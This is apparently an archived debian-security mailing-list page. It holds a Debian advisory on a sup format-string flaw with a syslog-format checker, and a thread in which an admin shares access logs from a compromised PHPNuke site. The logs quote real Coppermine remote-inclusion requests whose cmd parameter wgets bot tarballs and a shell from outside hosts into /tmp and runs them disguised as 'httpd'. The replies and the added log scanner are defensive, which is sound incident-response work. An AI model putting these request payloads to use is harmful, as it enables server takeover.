Ticket creation failed

2004-06-18 Thread bpt
No permission to create tickets in the queue 'accounts'
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 521-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                             Matt Zimmerman
June 18th, 2004                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: sup
Vulnerability  : format string
Problem-Type   : remote
Debian-specific: no
CVE Ids: CAN-2004-0451

[EMAIL PROTECTED] discovered a format string vulnerability in
sup, a set of programs to synchronize collections of files across a
number of machines, whereby a remote attacker could potentially cause
arbitrary code to be executed with the privileges of the supfilesrv
process (this process does not run automatically by default).

CAN-2004-0451: format string vulnerabilities in sup via syslog(3) in
logquit, logerr, loginfo functions
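
As an added example (not sup's code and not the Debian fix), a small Python checker for the pattern this advisory describes: a syslog(3) call whose format argument is a variable rather than a string literal. The C snippet it scans is constructed to resemble log helpers like logquit/logerr/loginfo and is hypothetical.

```python
"""Find syslog(3) calls whose format argument is not a string literal, the
pattern behind CAN-2004-0451. Added example; nothing here is sup's own code."""
import re

# Constructed C sample (hypothetical, modelled on helpers like sup's logerr()): vulnerable vs hardened.
SAMPLE_C = r'''
#include <syslog.h>
static char buf[1024];
/* vulnerable: the already-formatted message is passed as the format argument */
void logerr(const char *msg)  { snprintf(buf, sizeof buf, "sup: %s", msg); syslog(LOG_ERR, buf); }
/* hardened: a fixed literal format; the message travels as a %s argument */
void loginfo(const char *msg) { snprintf(buf, sizeof buf, "sup: %s", msg); syslog(LOG_INFO, "%s", buf); }
void logquit(const char *msg) { syslog(LOG_ERR, "%s, exiting", msg); exit(1); }
'''

CALL_RE = re.compile(r'\bsyslog\s*\(')

def split_args(src, start):
    """Top-level arguments of a call whose '(' ends at src[start]; string- and paren-aware."""
    args, cur, depth, in_str, i = [], [], 0, False, start
    while i < len(src):
        c = src[i]
        if in_str:
            if c == '\\':              # escaped char stays inside the literal
                cur.append(c)
                i += 1
                c = src[i]
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c == '(':
            depth += 1
        elif c == ')' and depth == 0:  # closing paren of the call itself
            args.append(''.join(cur).strip())
            return args
        elif c == ')':
            depth -= 1
        elif c == ',' and depth == 0:
            args.append(''.join(cur).strip())
            cur, c = [], ''            # start the next argument
        cur.append(c)
        i += 1
    raise ValueError('unterminated argument list')

def find_unsafe_syslog(src):
    """[(line_no, format_arg)] for each syslog() whose format is not a literal."""
    findings = []
    for m in CALL_RE.finditer(src):
        args = split_args(src, m.end())
        fmt = args[1] if len(args) > 1 else ''
        if not fmt.startswith('"'):    # a macro name is flagged too: review by hand
            findings.append((src.count('\n', 0, m.start()) + 1, fmt))
    return findings
```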

For the current stable distribution (woody), this problem has been
fixed in version 1.8-8woody2.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you update your sup package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2.dsc
  Size/MD5 checksum:  538 f5817f83647a677ec6781c9d55843307
http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2.diff.gz
  Size/MD5 checksum: 6859 7b9cf999b1fb2c7662024ceb0c498039
http://security.debian.org/pool/updates/main/s/sup/sup_1.8.orig.tar.gz
  Size/MD5 checksum:   65 76371f01340ce62cd71687349c5aa27e

  Alpha architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_alpha.deb
  Size/MD5 checksum:   103714 62123f3b8178825af23107d24c843bd1

  ARM architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_arm.deb
  Size/MD5 checksum:    82756 a866d4f3b3fdbdb86e2db7ba745ea480

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_i386.deb
  Size/MD5 checksum:    82624 580ca0b977cc27212c4e7778b435d4f3

  Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_ia64.deb
  Size/MD5 checksum:   127664 cf7db9e24bbf333da16343bcdc5e9e82

  HP Precision architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_hppa.deb
  Size/MD5 checksum:    94516 371292e2eaec3f04d49c8b29cb6e82ed

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_m68k.deb
  Size/MD5 checksum:    76454 4144ec09078326ba8e3facc6bef0e3b8

  Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_mips.deb
  Size/MD5 checksum:    96814 c7e843b2ac5573c792c8c45910717f07

  Little endian MIPS architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_mipsel.deb
  Size/MD5 checksum:    96452 c0558b55bce77470e1d9d52b515d39e1

  PowerPC architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_powerpc.deb
  Size/MD5 checksum:    85246 06e0683ba5c24a406a02b131304a6e6f

  IBM S/390 architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_s390.deb
  Size/MD5 checksum:    84656 b1e6f251fc3a22eb43d9bbd3044828bc

  Sun Sparc architecture:

http://security.debian.org/pool/updates/main/s/sup/sup_1.8-8woody2_sparc.deb
  Size/MD5 checksum:    89948 b8965ae16901df1eb9eb64faa8169d39

  These files will probably be moved into the stable distribution on
  its next revision.

- --------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA07eRArxCt0PiXR4RArlSAJ4iW4GblVHLWXwzearT+H4mGQcg/gCgiViY
A2Pf/3Y9xupsEwnFSH+Cr5w=
=yjyQ
-----END PGP SIGNATURE-----


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-18 Thread Steve Kemp
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
> 
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed seem to be IRC bots.
> http://www.energymech.net/
> 
> Here are some log files.
> 
> 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
> /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
> la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
> vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
> 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

> 
> All those executables in the /tmp dir seem to be all coming from that
> site on our box, definitely the culprit.
> 
> Can someone explain what is going on here ?
> Cause it doesn't make any sense.

  There seems to be some buggy PHP code being used on that site, which
 is allowing the remote inclusion of content from the mirabella.net
 site - this is being abused to run code upon your host.

  You should immediately disable the coppermine PHPNuke module and
 get it patched, upgraded, or replaced.

  Going to securityfocus.com and searching the mailing lists for
 coppermine pulls up multiple hits describing problems - for example
 this post:

http://www.securityfocus.com/archive/1/361976

  Notice the URLs on section E2?  They match yours..

  See this one for more details too:

http://www.securityfocus.com/archive/1/361976

  Two things you can do immediately to stop this particular exploit
 are run safe mode for PHP, and firewall off access to mirabella.net.

> What steps should I take now ?

  Remove PHP Nuke, check the logs for other activity, make sure your
 kernel is patched against local root via the recent holes, and
 look at using a locked down PHP installation - I'm not sure how
 PHPNuke will work with that, but it's gotta be worth a try.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
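
A defender-side check for what Steve describes, added here and not part of the thread: it parses Apache combined-format access log lines (the three requests quoted above, re-joined onto one line each, plus one constructed benign request as a control), flags query parameters carrying a remote URL or a shell command chain, and lists the hosts serving the included content so they can be firewalled off. The log format and the THEME_DIR/cmd parameter names come from the quoted lines; the regexes and thresholds are assumptions.

```python
"""Flag remote-file-inclusion and command-injection attempts in Apache combined
access logs, modelled on the Coppermine theme.php requests quoted in this thread."""
import re
from urllib.parse import urlsplit, unquote

# Sample input: the three requests quoted in the thread, re-joined onto one
# line each, plus one constructed benign request (10.0.0.5) as a control.
SAMPLE_LOG = [
    '193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"',
    '193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"',
    '200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooksequipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"',
    '10.0.0.5 - - [18/Jun/2004:23:01:00 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=default HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://([^/?#]+)', re.IGNORECASE)  # include-by-URL
SHELL_CMD = re.compile(r'[;|`]|\b(?:wget|curl|chmod)\b')                # command chaining

def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def query_params(target):
    """Yield decoded (key, value) pairs, splitting on '&' only: the ';' inside
    the cmd parameter is part of the payload, not a separator."""
    for pair in urlsplit(target).query.split('&'):
        key, _, value = pair.partition('=')
        yield unquote(key), unquote(value)

def scan(lines):
    """One finding per suspicious parameter: (ip, path, param, reason, value)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec['target']).path
        for key, value in query_params(rec['target']):
            if REMOTE_URL.match(value):
                findings.append((rec['ip'], path, key, 'remote-include', value))
            elif SHELL_CMD.search(value):
                findings.append((rec['ip'], path, key, 'shell-command', value))
    return findings

def remote_hosts(findings):
    """Hosts serving the included content: candidates for an egress block."""
    return {REMOTE_URL.match(v).group(1).lower()
            for _, _, _, reason, v in findings if reason == 'remote-include'}

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```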



RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-18 Thread Ross Tsolakidis
Hi all,

I did a search in the logs on some of the suspicious users and found a
match.
The files that are being downloaded then executed seem to be IRC bots.
http://www.energymech.net/

Here are some log files.

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"

200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooks
equipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell
HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98;
Win 9x 4.90)"

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"


All those executables in the /tmp dir seem to be all coming from that
site on our box, definitely the culprit.

Can someone explain what is going on here ?
Cause it doesn't make any sense.

The site in question is a phpnuke site with lots of modules.

What steps should I take now ?

Thanks very much for everyone's help.



--
Ross

-----Original Message-----
From: Ross Tsolakidis 
Sent: Friday, 18 June 2004 9:20 AM
To: debian-security@lists.debian.org
Subject: RE: Advice needed, trying to find the vulnerable code on Debian
webserver.

Thanks to everyone who has responded.
I will be investigating all these options in the next few days, I'll
keep you all informed. 


--
Ross

-----Original Message-----
From: Steve Kemp [mailto:[EMAIL PROTECTED] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: [EMAIL PROTECTED]
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > > 
> > > Install some rules for it to harden your webserver, see if 
> > > anything is flagged in the security log.
> > 
> > other web server testing tools
> > http://www.linux-sec.net/Web/#Testing
> 
> Has anyone actually used any of these to find the vulnerabilities that

> are being discussed?

  Not personally, I've used snort and some other custom logging code to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or do the
access logs show anything suspicious?  It's clear that Apache is the
route into the system if you have files owned by www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

  
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit

